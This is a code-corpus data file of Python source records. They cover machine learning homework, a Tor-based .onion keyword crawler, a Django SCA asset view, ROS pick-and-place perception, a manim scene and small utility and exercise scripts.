attr[1:]\n setattr(self, name, getattr(self.config, attr))\n \n \n def save_model(self, step=None):\n print(\"[*] Saving a checkpoint\")\n if(not os.path.exists(self.checkpoint_dir)):\n os.makedirs(self.checkpoint_dir)\n self.saver.save(self.sess, self.checkpoint_dir, global_step=self.step)\n \n def load_model(self):\n print(\"[*] Loading a model\")\n chkpt = tf.train.get_checkpoint_state(self.checkpoint_dir)\n if(chkpt and chkpt.model_checkpoint_path):\n chkpt_name = os.path.basename(chkpt.model_checkpoint_path)\n fname = os.path.join(self.checkpoint_dir, chkpt_name)\n self.saver.restore(self.sess, fname)\n print(\"[*] SUCCESS!\")\n return True\n else:\n print(\"Model load failed....\")\n return False\n \n @property\n def checkpoint_dir(self):\n return os.path.join('checkpoints', self.model_dir)\n \n @property\n def model_dir(self):\n model_dir = self.config.name\n for k, v in self._attrs.items():\n if not k.startswith('_') and k not in ['display']:\n model_dir += \"/%s-%s\" % (k, \",\".join([str(i) for i in v])\n if type(v) == list else v)\n return model_dir + '/'\n\n @property\n def saver(self):\n if(self._saver == None):\n self._saver = tf.train.Saver(max_to_keep=10)\n return self._saver\n","sub_path":"base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"270486410","text":"import datetime\n\ndef getDateTime(str_date):\n\t'''\n\tConverts string date to a date time object.\n\tParameters\n\t----------\n\tstr_date (String): A date string\n\tReturns\n\t-------\n\tDatetime object\n\n\t'''\n\tif len(str_date) == 0:\n\t return 'None'\n\telse:\n\t dt_format = \"%Y-%m-%d %H:%M:%S.%f\"\n\t return datetime.datetime.strptime(str_date, dt_format)","sub_path":"preprocess/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"211437404","text":"import numpy as np\nfrom SistemaFuzzy.Model import Regra\n\n\nclass Reducao:\n\n def __init__(self, regras, instancias, particoes):\n self.regrasComRuido = regras\n self.regras_para_classificacao = []\n self.instancias = instancias\n self.particoes = particoes\n self.regras = []\n self.tnormas = []\n\n def reduzir(self):\n for instancia in self.instancias:\n caracteristicas = instancia.caracteristicas\n classe = instancia.classe\n for regraAtual in self.regrasComRuido:\n antecedentes_regras = regraAtual.antecedentes\n consequente = regraAtual.consequente\n pertinencias_maximas = []\n for id_antecedente, caracteristica, particao in zip(antecedentes_regras, caracteristicas, self.particoes):\n #print(id_antecedente, caracteristicas, particao)\n pertinencia = particao.getPertinenciaIdConjunto(id_antecedente, caracteristica)\n pertinencias_maximas.append(pertinencia)\n tnorma = np.prod(pertinencias_maximas)\n self.atualizarRegras(tnorma, regraAtual)\n self.preencher_regra_nula()\n\n #print(\"1 - \", len(self.regrasComRuido))\n #print(\"2 - \", len(self.regras))\n #print(\"3 - \", len(self.regrasSemRuido))\n #for regra in self.regrasSemRuido:\n # print(regra)\n #a = 2 + \"2\"\n return self.regrasSemRuido\n\n def preencher_regra_nula(self):\n for regra in self.regrasComRuido:\n regraNula = Regra.Regra([-1] * len(regra.antecedentes), -1, 1, 1)\n self.regrasSemRuido.append(regraNula)\n for posicao, regra in enumerate(self.regrasComRuido):\n if regra in self.regras:\n self.regrasSemRuido[posicao] = regra\n\n\n\n def atualizarRegras(self, tnorma, regraAtual):\n\n if tnorma > 0:\n index, cond = self.inconsistencia(regraAtual)\n if not cond:\n self.regras.append(regraAtual)\n self.tnormas.append(tnorma)\n elif self.tnormas[index] < tnorma:\n self.regras[index] = regraAtual\n self.tnormas[index] = tnorma\n\n def inconsistencia(self, novaRegra):\n for index, r in enumerate(self.regras):\n if r.__eq__(novaRegra):\n return index, True\n return -1, False\n\n\nregra1 = Regra.Regra([1, 1, 1, 1], 1, 0.5)\nregra2 = Regra.Regra([1, 1, 1, 2], 1, 0.7)\nregra3 = Regra.Regra([1, 1, 1, 2], 2, 0.5)\nregra4 = Regra.Regra([1, 1, 1, 3], 3, 0.5)\n\nregras = [regra1,regra2,regra3,regra4]\nsemDuplicidade = []\nfor regra in regras:\n if not regra in semDuplicidade:\n semDuplicidade.append(regra)\nsemAmbiguidade = []\ncomAmbiguidade = []\nfor regra in semDuplicidade:\n encontrou = False\n for sa in semAmbiguidade:\n if regra.eq_antecedentes(sa):\n semAmbiguidade.remove(sa)\n comAmbiguidade.append(sa)\n comAmbiguidade.append(regra)\n encontrou = True\n if not encontrou:\n semAmbiguidade.append(regra)\n\n\"\"\"\nprint(\"Sem Ambiguidade\")\nfor regra in semAmbiguidade:\n print(regra.__str__())\n\nprint(\"Com Ambiguidade\")\nfor regra in comAmbiguidade:\n print(regra.__str__())\n\nregrasTratadas = semAmbiguidade\"\"\"\n\n\n\n","sub_path":"100-Testes/Reducao_RegrasV2.py","file_name":"Reducao_RegrasV2.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"377376468","text":"import math\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport time\n\nLEARNING_RATE = 0.1\n\ndef main():\n if len(sys.argv) < 9:\n print(\"Please give formatted_train_out, formatted_validation_out, formatted_test_out, dict_input, \"\n \"train_out_labels, test_out_labels, metrics_out, and epochs respectively in commandline arguments.\")\n\n # start = time.time()\n formatted_train_out = sys.argv[1]\n formatted_validation_out = sys.argv[2]\n formatted_test_out = sys.argv[3]\n dict_input = sys.argv[4]\n train_out_labels = sys.argv[5]\n test_out_labels = sys.argv[6]\n metrics_out = sys.argv[7]\n epochs = int(sys.argv[8])\n\n with open(dict_input, 'r') as f:\n dict_input = f.readlines()\n word_dict = {}\n for line in dict_input:\n key, value = line.split()\n word_dict[key.strip()] = int(value)\n with open(formatted_train_out, 'r') as f:\n train_data = f.readlines()\n # with open(formatted_validation_out, 'r') as f:\n # validation_data = f.readlines()\n with open(formatted_test_out, 'r') as f:\n test_data = f.readlines()\n\n theta = np.zeros(len(word_dict)+1)\n X_train, Y_train = get_data(train_data)\n # X_validation, Y_validation = get_data(validation_data)\n X_test, Y_test = get_data(test_data)\n theta = train_logistic_regression(X_train, Y_train, theta, epochs)\n # theta, train_loss, validation_loss = train_logistic_regression_valid(X_train, Y_train, X_validation, Y_validation, theta, epochs)\n Y_train_predicted = predict(X_train, theta)\n Y_test_predicted = predict(X_test, theta)\n train_error = calculate_error(Y_train_predicted, Y_train)\n test_error = calculate_error(Y_test_predicted, Y_test)\n\n with open(train_out_labels, 'w') as f:\n for i in range(len(Y_train_predicted)):\n f.write(str(Y_train_predicted[i]))\n f.write('\\n')\n with open(test_out_labels, 'w') as f:\n for i in range(len(Y_test_predicted)):\n f.write(str(Y_test_predicted[i]))\n f.write('\\n')\n with open(metrics_out, 'w') as f:\n f.write(\"error(train): {}\\n\".format(str.format('{0:.6f}', train_error)))\n f.write(\"error(test): {}\\n\".format(str.format('{0:.6f}', test_error)))\n # end = time.time()\n # print(end-start)\n\n # print(train_loss)\n # print(validation_loss)\n # plt.plot(range(len(train_loss[:200])), train_loss[:200], label=\"Train Loss\")\n # plt.plot(range(len(validation_loss[:200])), validation_loss[:200], label=\"Validation Loss\")\n # plt.xlabel(\"Number of Epochs\")\n # plt.ylabel(\"Average Negative Log Likelihood\")\n # plt.legend()\n # plt.show()\n\ndef calculate_error(Y_predicted, Y):\n count = 0.0\n for i in range(len(Y)):\n if Y_predicted[i] != Y[i]:\n count += 1\n return count/float(len(Y))\n\ndef train_logistic_regression(X_train, Y_train, theta, epochs):\n for i in range(epochs):\n for j in range(len(X_train)):\n theta = update_theta_step_sgd(theta, X_train, Y_train, j)\n # train_loss = calculate_loss_function(theta, X_train, Y_train)\n # print(\"Train loss after epoch {}: {}\\n\".format(i, train_loss))\n return theta\n\ndef train_logistic_regression_valid(X_train, Y_train, X_validation, Y_validation, theta, epochs):\n train_loss, validation_loss = [], []\n for i in range(epochs):\n for j in range(len(X_train)):\n theta = update_theta_step_sgd(theta, X_train, Y_train, j)\n train_loss.append(calculate_loss_function(theta, X_train, Y_train))\n validation_loss.append(calculate_loss_function(theta, X_validation, Y_validation))\n return theta, train_loss, validation_loss\n\ndef predict(X, theta):\n Y = []\n for i in range(len(X)):\n theta_x = calculate_dot_product(theta, X[i])\n exponent = math.exp(theta_x)\n if (exponent/(1.0 + exponent)) > 0.5:\n Y.append(1)\n else:\n Y.append(0)\n return Y\n\ndef get_data(data_lines):\n X, Y = [], []\n for data_line in data_lines:\n line_data = data_line.split('\\t')\n y = int(line_data[0])\n Y.append(y)\n x = {0: 1}\n parameters = line_data[1:]\n for parameter in parameters:\n vals = parameter.split(':')\n x[int(vals[0])+1] = int(vals[1])\n X.append(x)\n return X, Y\n\ndef update_theta_step_sgd(theta, X, Y, i):\n theta_x = calculate_dot_product(theta, X[i])\n gradient = np.zeros(len(theta))\n for key in X[i].keys():\n term1 = -1 * (X[i])[key]\n exponent = math.exp(theta_x)\n term2 = Y[i] - (exponent/(1.0 + exponent))\n gradient[key] = term1 * term2\n theta = theta - LEARNING_RATE * gradient\n return theta\n\ndef calculate_loss_function(theta, X, Y):\n sum = 0.0\n for i in range(len(X)):\n theta_x = calculate_dot_product(theta, X[i])\n term1 = -1 * Y[i] * theta_x\n term2 = math.log(1.0 + math.exp(theta_x))\n sum += (term1 + term2)\n return sum/len(X)\n\ndef calculate_dot_product(theta, x):\n sum = 0.0\n for key in x.keys():\n sum += theta[key] * x[key]\n return sum\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"HW4/handout/pr.py","file_name":"pr.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639068527","text":"import socks\nimport socket\nimport requests\nimport re\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\n\n\n# libraries to scarp the data\nfrom bs4 import BeautifulSoup\nfrom bs4.element import Comment\nfrom urllib.request import urlopen\n\n\n# connect socks \nsocks.set_default_proxy(socks.SOCKS5, \"localhost\", 9150)\nsocket.socket = socks.socksocket\n# yake module to extract Keywords\nimport yake\nkw_extractor = yake.KeywordExtractor()\nlanguage = \"en\"\nmax_ngram_size = 2\ndeduplication_thresold = 0.9\ndeduplication_algo = 'seqm'\nwindowSize = 1\n# get the top 20 keywords\nnumOfKeywords = 20\n\n\n# for socket connection\ndef getaddrinfo(*args):\n return [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]\nsocket.getaddrinfo = getaddrinfo\n\n\n# to find the visible Tags\ndef tag_visible(element):\n if element.parent.name in ['style', 'script', 'head', 'title', 'meta', '[document]','script','a']:\n return False\n if isinstance(element, Comment):\n return False\n return True\n\n\n# code to get text from HTML\ndef text_from_html(body):\n soup = BeautifulSoup(body, 'html.parser')\n texts = soup.findAll(text=True)\n visible_texts = filter(tag_visible, texts) \n return u\" \".join(t.strip() for t in visible_texts)\n\n\n# read the link & get the HTML\nhtml = urlopen('http://jncyepk6zbnosf4p.onion/onions.html').read()\n# parse the HTML\nsoup = BeautifulSoup(html, \"html.parser\")\n# Get the PRE tags\npre_tags = soup.findAll('pre',text=True)\n\n\n# below code is to extract the urls from the link\nonions = []\nfor i, pre_tag in enumerate(pre_tags): \n\ttry:\n\t\tif i!=0:\n\t\t\ttext = (pre_tag.text)\n\t\t\tonion_unfiltered = (text.split(\"\\u2003\\u2003\\u2003\\u2003\"))\n\t\t\tif onion_unfiltered[1].endswith('onion') and onion_unfiltered[3] == '200':\n\t\t\t\tonions.append(onion_unfiltered[1])\n\texcept Exception as E:\n\t\tpass\n\n\noutput = {}\ncustom_kw_extractor = yake.KeywordExtractor(lan=language, n=max_ngram_size, dedupLim=deduplication_thresold, dedupFunc=deduplication_algo, windowsSize=windowSize, top=numOfKeywords, features=None)\n\n# function to extract key words from the onion link\ndef tag(onion):\n\ttry:\n\t\t# extract the HTML\n\t\thtml = urlopen('http://'+onion).read()\n\t\t# get the text from the HTML\n\t\ttext = text_from_html(html)\n\t\t# extract keywords from the text\n\t\tkeywords = custom_kw_extractor.extract_keywords(text)\n\t\t# add keywords to the output\n\t\tfor kw in keywords:\n\t\t\tif onion not in output:\n\t\t\t\toutput[onion] = [kw[0]]\n\t\t\telse: \n\t\t\t\toutput[onion].append(kw[0])\n\texcept Exception as E:\n\t\tpass\n\n\n# making concurrency\nprocesses = []\n# assigning 5 workers\nwith ThreadPoolExecutor(max_workers=5) as executor:\n\t# creating threads for the first 5 onions\n\tfor onion in onions[:5]:\n \tprocesses.append(executor.submit(tag, onion))\n\n\nfor task in as_completed(processes):\n\ttask.result()\n\n\n# prints the url & its resp. keywords\nprint(output)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"279383060","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author:owefsad\n# software: PyCharm\n# project: lingzhi-webapi\n\nfrom dongtai.endpoint import R, UserEndPoint\nfrom dongtai.models.asset import Asset\n\nfrom iast.base.agent import get_agents_with_project\nfrom iast.base.project_version import get_project_version, get_project_version_by_id\nfrom iast.serializers.sca import ScaSerializer\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass ScaList(UserEndPoint):\n def get(self, request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n auth_users = self.get_auth_users(request.user)\n auth_agents = self.get_auth_agents(auth_users)\n\n language = request.query_params.get('language')\n if language:\n auth_agents = auth_agents.filter(language=language)\n\n queryset = Asset.objects.filter(agent__in=auth_agents)\n\n order = request.query_params.get('order', None)\n order_fields = [\n 'level', 'package_name', 'vul_count', 'version', 'language', 'dt',\n 'project_name'\n ]\n order = order if order in order_fields + list(\n map(lambda x: ''.join(['-', x]), order_fields)) else None\n\n package_kw = request.query_params.get('keyword', None)\n\n project_id = request.query_params.get('project_id', None)\n if project_id and project_id != '':\n\n version_id = request.GET.get('version_id', None)\n if not version_id:\n current_project_version = get_project_version(\n project_id, auth_users)\n else:\n current_project_version = get_project_version_by_id(version_id)\n agents = self.get_auth_agents(auth_users).filter(\n bind_project_id=project_id,\n project_version_id=current_project_version.get(\"version_id\", 0)\n )\n queryset = queryset.filter(agent__in=agents)\n project_name = request.query_params.get('project_name')\n if project_name and project_name != '':\n agent_ids = get_agents_with_project(project_name, auth_users)\n if agent_ids:\n queryset = queryset.filter(agent_id__in=agent_ids)\n\n level = request.query_params.get('level')\n if level:\n queryset = queryset.filter(level=level)\n\n if package_kw and package_kw.strip() != '':\n queryset = queryset.filter(package_name__icontains=package_kw)\n\n if order:\n queryset = queryset.order_by(order)\n else:\n queryset = queryset.order_by('-dt')\n page = request.query_params.get('page', 1)\n page_size = request.query_params.get('pageSize', 20)\n page_summary, page_data = self.get_paginator(queryset, page, page_size)\n return R.success(data=ScaSerializer(page_data, many=True).data, page=page_summary)\n","sub_path":"iast/views/scas.py","file_name":"scas.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"5883558","text":"from PIL import Image\nfrom tempfile import NamedTemporaryFile\nfrom io import BytesIO\nimport requests\n\ndef apply_harper_collins_logo(url):\n response = requests.get(url)\n background = Image.open(BytesIO(response.content))\n foreground = Image.open('images/harper_collins_logo.png')\n foreground.thumbnail((background.width // 4, background.width // 4), Image.ANTIALIAS)\n y_coord = background.height - foreground.height\n background.paste(foreground, (0, y_coord), foreground.convert('RGBA'))\n\n temp_file=NamedTemporaryFile()\n background.save(temp_file, format='png')\n return temp_file\n","sub_path":"process_image.py","file_name":"process_image.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"84992107","text":"import sys\nfrom manim_imports_ext import *\n\nclass MeasureScene(AlgoScene):\n def construct(self):\n shape = self.camera.frame.get_shape()\n\n t = Text(\"1 width %.2f height %.2f delta 0.00\"%(shape[0], shape[1]), color=GREEN, font_size=20).shift(LEFT*3).scale(1)\n self.add(t)\n horizon = Line(start=LEFT*shape[0]/2, end=RIGHT*shape[0]/2, color=RED)\n verticle = Line(start=UP*shape[1]/2, end=DOWN*shape[1]/2, color=BLUE)\n\n t.next_to(horizon, direction=UP, buff=0)\n\n count = 2\n delta = 0.0\n while True:\n nt = Text(\"%d width %.2f height %.2f delta %.2f\"%(count, shape[0], shape[1], delta), \n color=GREEN, font_size=20).shift(LEFT*3).scale(1)\n nt.next_to(t, direction=UP, buff=0)\n p = nt.get_center()\n delta = p[1] - t.get_center()[1]\n t = nt\n if p[1] > shape[1]/2:\n break\n count += 1\n self.add(nt)\n\n # self.camera.frame.shift(OUT*0.2)\n self.play(ShowCreation(horizon), ShowCreation(verticle))\n self.snapshot()\n self.wait()\n","sub_path":"animations/measure_scene.py","file_name":"measure_scene.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"252887403","text":"import logging\nfrom flask import request, jsonify\nfrom codeitsuisse import app\n\nlogger = logging.getLogger(__name__)\n\n@app.route('/inventory-management', methods=['POST'])\ndef evaluateInventoryManagement():\n data = request.get_json()\n logging.info('data sent for evaluation: {}'.format(data))\n result = []\n for test in data:\n target = test['searchItemName']\n items = test['items']\n ans = solve(target, items)\n result.append({'searchItemName': target, 'searchResult': ans})\n logging.info('my result: {}'.format(result))\n return jsonify(result)\n\ndef solve(target, items):\n ans = {}\n str_ans = {}\n for item in items:\n l1 = len(target)\n l2 = len(item)\n l = max(l1, l2) + 1\n \n # init\n table = [[0 for j in range(l)] for i in range(l)]\n for i in range(1, l1 + 1):\n table[i][0] = i * 1\n for j in range(1, l2 + 1):\n table[0][j] = j * 1\n str_table = [['' for j in range(l)] for i in range(l)]\n for i in range(1, l1 + 1):\n str_table[i][0] = str_table[i - 1][0] + '-' + target[i - 1]\n for j in range(1, l2 + 1):\n str_table[0][j] = str_table[j - 1][0] + '+' + item[j - 1]\n\n # dp\n for i in range(1, l1 + 1):\n for j in range(1, l2 + 1):\n # replace\n if target[i - 1].lower() == item[j - 1].lower():\n table[i][j] = table[i - 1][j - 1]\n str_table[i][j] = str_table[i - 1][j - 1] + target[i - 1]\n else:\n table[i][j] = table[i - 1][j - 1] + 1\n str_table[i][j] = str_table[i - 1][j - 1] + item[j - 1]\n # delete\n temp_del = table[i - 1][j] + 1\n if temp_del < table[i][j]:\n table[i][j] = temp_del\n str_table[i][j] = str_table[i - 1][j] + '-' + target[i - 1]\n # insert\n temp_ins = table[i][j - 1] + 1\n if temp_ins < table[i][j]:\n table[i][j] = temp_ins\n str_table[i][j] = str_table[i][j - 1] + '+' + item[j - 1]\n \n ans[item] = table[l1][l2]\n str_ans[item] = str_table[l1][l2]\n\n sorted_ans = sorted(ans.items(), key=lambda x: (x[1], x[0]))\n\n res = []\n for i in sorted_ans:\n print(i[0], i[1])\n res.append(str_ans[i[0]])\n\n if len(res) > 10:\n res = res[:10]\n\n return res\n","sub_path":"codeitsuisse/routes/inventory_management.py","file_name":"inventory_management.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"384860578","text":"#!/usr/bin/env python\n\n# Import modules\nimport numpy as np\nimport sklearn\nfrom sklearn.preprocessing import LabelEncoder\nimport pickle\nfrom sensor_stick.srv import GetNormals\nfrom sensor_stick.features import compute_color_histograms\nfrom sensor_stick.features import compute_normal_histograms\nfrom visualization_msgs.msg import Marker\nfrom sensor_stick.marker_tools import *\nfrom sensor_stick.msg import DetectedObjectsArray\nfrom sensor_stick.msg import DetectedObject\nfrom sensor_stick.pcl_helper import *\n\nimport rospy\nimport tf\nfrom geometry_msgs.msg import Pose, Point, Quaternion\nfrom std_msgs.msg import Float64\nfrom std_msgs.msg import Int32\nfrom std_msgs.msg import String\nfrom pr2_robot.srv import *\nfrom rospy_message_converter import message_converter\nimport yaml\nimport os\n\n# Helper function to get surface normals\ndef get_normals(cloud):\n get_normals_prox = rospy.ServiceProxy('/feature_extractor/get_normals', GetNormals)\n return get_normals_prox(cloud).cluster\n\n# Helper function to create a yaml friendly dictionary from ROS messages\ndef make_yaml_dict(test_scene_num, arm_name, object_name, pick_pose, place_pose):\n yaml_dict = {}\n yaml_dict[\"test_scene_num\"] = test_scene_num.data\n yaml_dict[\"arm_name\"] = arm_name.data\n yaml_dict[\"object_name\"] = object_name.data\n yaml_dict[\"pick_pose\"] = message_converter.convert_ros_message_to_dictionary(pick_pose)\n yaml_dict[\"place_pose\"] = message_converter.convert_ros_message_to_dictionary(place_pose)\n return yaml_dict\n\n# Helper function to output to yaml file\ndef send_to_yaml(yaml_filename, dict_list):\n data_dict = {\"object_list\": dict_list}\n with open(yaml_filename, 'w') as outfile:\n yaml.dump(data_dict, outfile, default_flow_style=False)\n\n# Define functions as required\ndef vox_filt( cloud, LEAF_SIZE = 0.005 ):\n vox = cloud.make_voxel_grid_filter()\n vox.set_leaf_size(LEAF_SIZE, LEAF_SIZE, LEAF_SIZE)\n return vox.filter()\n\ndef passthrough_filt( cloud, filter_axis = 'z', axis_min = 0.6, axis_max = 1.1 ):\n passthrough = cloud.make_passthrough_filter()\n passthrough.set_filter_field_name(filter_axis)\n passthrough.set_filter_limits(axis_min, axis_max)\n return passthrough.filter()\n\ndef outlier_filt( cloud, mean_k = 10, dev_mul = 0.01 ):\n out = cloud.make_statistical_outlier_filter()\n out.set_mean_k( mean_k )\n out.set_std_dev_mul_thresh( dev_mul)\n return out.filter()\n\ndef seg_plane( cloud, max_distance = 0.01 ):\n seg = cloud.make_segmenter()\n seg.set_model_type(pcl.SACMODEL_PLANE)\n seg.set_method_type(pcl.SAC_RANSAC)\n seg.set_distance_threshold(max_distance)\n inliers, coefficients = seg.segment()\n return inliers, coefficients\n\ndef euclidean_cluster( white_cloud, tolerance = 0.05, min = 100, max = 2500 ):\n tree = white_cloud.make_kdtree()\n # Create a cluster extraction object\n ec = white_cloud.make_EuclideanClusterExtraction()\n # Set tolerances for distance threshold\n # as well as minimum and maximum cluster size (in points)\n ec.set_ClusterTolerance( tolerance )\n ec.set_MinClusterSize( min )\n ec.set_MaxClusterSize( max )\n # Search the k-d tree for clusters\n ec.set_SearchMethod( tree )\n # Extract indices for each of the discovered clusters\n return ec.Extract()\n\n# Callback function for your Point Cloud Subscriber\ndef pcl_callback(pcl_msg):\n\n # Convert ROS msg to PCL data\n cloud = ros_to_pcl( pcl_msg )\n\n # Outliers removing\n cloud = outlier_filt( cloud )\n\n # Voxel Grid Downsampling\n cloud = vox_filt( cloud )\n\n # PassThrough Filter\n cloud = passthrough_filt( cloud )\n cloud = passthrough_filt( cloud, filter_axis = 'y', axis_min = - 0.45, axis_max = 0.45 )\n\n # RANSAC Plane Segmentation\n inliers, coefficients = seg_plane( cloud )\n\n # Extract inliers and outliers\n cloud_table = cloud.extract( inliers, negative = False )\n cloud_objects = cloud.extract( inliers, negative = True )\n\n # Euclidean Clustering\n white_cloud = XYZRGB_to_XYZ( cloud_objects )\n cluster_indices = euclidean_cluster( white_cloud )\n\n # Create Cluster-Mask Point Cloud to visualize each cluster separately\n #Assign a color corresponding to each segmented object in scene\n cluster_color = get_color_list( len( cluster_indices ) )\n\n color_cluster_point_list = []\n\n for j, indices in enumerate( cluster_indices ):\n for i, indice in enumerate(indices):\n color_cluster_point_list.append( [ white_cloud[ indice ][ 0 ],\n white_cloud[ indice ][ 1 ],\n white_cloud[ indice ][ 2 ],\n rgb_to_float( cluster_color[ j ] ) ] )\n\n #Create new cloud containing all clusters, each with unique color\n cluster_cloud = pcl.PointCloud_PointXYZRGB()\n cluster_cloud.from_list( color_cluster_point_list )\n\n ros_cluster_cloud = pcl_to_ros( cluster_cloud )\n\n # Convert PCL data to ROS messages\n ros_cloud_table = pcl_to_ros( cloud_table )\n ros_cloud_objects = pcl_to_ros( cloud_objects )\n\n # Publish ROS messages\n pcl_table_pub.publish( ros_cloud_table )\n pcl_objects_pub.publish( ros_cloud_objects )\n\n pcl_cluster_pub.publish( ros_cluster_cloud )\n\n # Exercise-3 TODOs:\n\n # Classify the clusters! (loop through each detected cluster one at a time)\n detected_objects = []\n detected_objects_labels = []\n\n for idx, pts_list in enumerate( cluster_indices ):\n # Grab the points for the cluster\n pcl_cluster = cloud_objects.extract( pts_list )\n ros_cluster = pcl_to_ros( pcl_cluster )\n\n # Compute the associated feature vector\n chists = compute_color_histograms( ros_cluster, using_hsv = True )\n # normals = get_normals( ros_cluster )\n # nhists = compute_normal_histograms( normals )\n feature = chists # np.concatenate( ( chists, nhists ) )\n\n # Make the prediction\n prediction = clf.predict( scaler.transform( feature.reshape( 1, -1 ) ) )\n label = encoder.inverse_transform( prediction )[ 0 ]\n detected_objects_labels.append( label )\n\n # Publish a label into RViz\n label_pos = list( white_cloud[ pts_list[ 0 ] ] )\n label_pos[ 2 ] += .4\n object_markers_pub.publish( make_label( label, label_pos, idx ) )\n\n # Add the detected object to the list of detected objects.\n do = DetectedObject()\n do.label = label\n do.cloud = ros_cluster\n detected_objects.append( do )\n\n rospy.loginfo( 'Detected {} objects: {}'.format( len( detected_objects_labels ), detected_objects_labels ) )\n\n # Publish the list of detected objects\n detected_objects_pub.publish( detected_objects )\n\n # output yaml\n output_file = 'output_1.yaml'\n\n if not os.path.exists( output_file ):\n object_list_param = rospy.get_param( '/object_list' )\n dropbox_param = rospy.get_param( '/dropbox' )\n\n if dropbox_param[ 0 ][ 'group' ] == 'red':\n dropbox = {\n 'red': dropbox_param[ 0 ],\n 'green': dropbox_param[ 1 ]\n }\n else:\n dropbox = {\n 'red': dropbox_param[ 1 ],\n 'green': dropbox_param[ 0 ]\n }\n\n dicts = []\n for obj in object_list_param:\n name = obj[ 'name' ]\n group = obj[ 'group' ]\n box = dropbox[ group ]\n\n for do in detected_objects:\n if do.label == name:\n ps = ros_to_pcl( do.cloud ).to_array()\n cs = np.mean( ps, axis = 0 )[ : 3 ]\n\n dict = make_yaml_dict( * pick_req( 1, box[ 'name' ], name, cs, box[ 'position' ] ) )\n dicts.append( dict )\n\n send_to_yaml( output_file, dicts )\n\ndef pick_req( test_scene_num, arm_name, object_name, pick_pose, place_pose ):\n msg_scene = Int32()\n msg_scene.data = test_scene_num\n\n msg_arm_name = String()\n msg_arm_name.data = arm_name\n\n msg_obj_name = String()\n msg_obj_name.data = object_name\n\n msg_pick_pose = Pose()\n msg_pick_pose.position = Point()\n msg_pick_pose.position.x = np.asscalar( pick_pose[ 0 ] )\n msg_pick_pose.position.y = np.asscalar( pick_pose[ 1 ] )\n msg_pick_pose.position.z = np.asscalar( pick_pose[ 2 ] )\n\n msg_place_pose = Pose()\n msg_place_pose.position = Point()\n msg_place_pose.position.x = place_pose[ 0 ]\n msg_place_pose.position.y = place_pose[ 1 ]\n msg_place_pose.position.z = place_pose[ 2 ]\n\n return msg_scene, msg_arm_name, msg_obj_name, msg_pick_pose, msg_place_pose\n\nif __name__ == '__main__':\n\n # TODO: ROS node initialization\n rospy.init_node( 'pick_place', anonymous = True )\n\n # TODO: Create Subscribers\n pcl_sub = rospy.Subscriber( \"/pr2/world/points\", PointCloud2, pcl_callback, queue_size = 1 )\n\n # TODO: Create Publishers\n pcl_table_pub = rospy.Publisher( \"/pcl_table\", PointCloud2, queue_size = 1 )\n pcl_objects_pub = rospy.Publisher( \"/pcl_objects\", PointCloud2, queue_size = 1 )\n\n pcl_cluster_pub = rospy.Publisher( \"/pcl_cluster\", PointCloud2, queue_size = 1 )\n\n object_markers_pub = rospy.Publisher( '/object_markers', Marker, queue_size = 1 )\n detected_objects_pub = rospy.Publisher( '/detected_objects', DetectedObjectsArray, queue_size = 1 )\n\n # TODO: Load Model From disk\n model = pickle.load( open( 'model.sav', 'rb' ) )\n clf = model[ 'classifier' ]\n encoder = LabelEncoder()\n encoder.classes_ = model[ 'classes' ]\n scaler = model[ 'scaler' ]\n\n # Initialize color_list\n get_color_list.color_list = []\n\n # TODO: Spin while node is not shutdown\n while not rospy.is_shutdown():\n rospy.spin()\n","sub_path":"pr2_robot/scripts/pick_place.py","file_name":"pick_place.py","file_ext":"py","file_size_in_byte":9729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"149413028","text":"\"\"\"\r\n============================\r\nAuthor:柠檬班-木森\r\nTime:2020/5/11 14:29\r\nE-mail:3247119728@qq.com\r\nCompany:湖南零檬信息技术有限公司\r\n============================\r\n\"\"\"\r\n\r\n\r\n# 第一题\r\ndef work1():\r\n li = [11, 21, 4, 55, 6, 67, 123, 54, 66, 9, 90, 56, 34, 22]\r\n li1 = filter(lambda x: x > 5, li)\r\n return [i % 2 for i in li1]\r\n\r\n\r\n# 第二题\r\ndef work2():\r\n name = yield\r\n for i in range(5):\r\n if not isinstance(name, str):\r\n name = '127.0.0.1:8000'\r\n name = yield \"http://\" + name + \"/user/login\"\r\n\r\n\r\n# gen = work2()\r\n# next(gen)\r\n# res = gen.send('www.baidu.com')\r\n# print(res)\r\n# res = gen.send('www.qq.com')\r\n# print(res)\r\n\"\"\"\r\n# 有一个正整数列表(数据是无序的,并且允许有相等的整数存在),\r\n# 编写能实现下列功能的函数,传入列表和正整数x,返回下面要求的三个数据\r\n# def func(array, x)\r\n# '''逻辑代码'''\r\n# return count, li, new_array\r\n# 1、统计并返回在列表中,比正整数x大的数有几个(相同的数只计算一次),并返回-----返回值中的的count\r\n# 2、计算列表中比正整数X小的所有偶数,并返回 -----------返回值中的li\r\n# 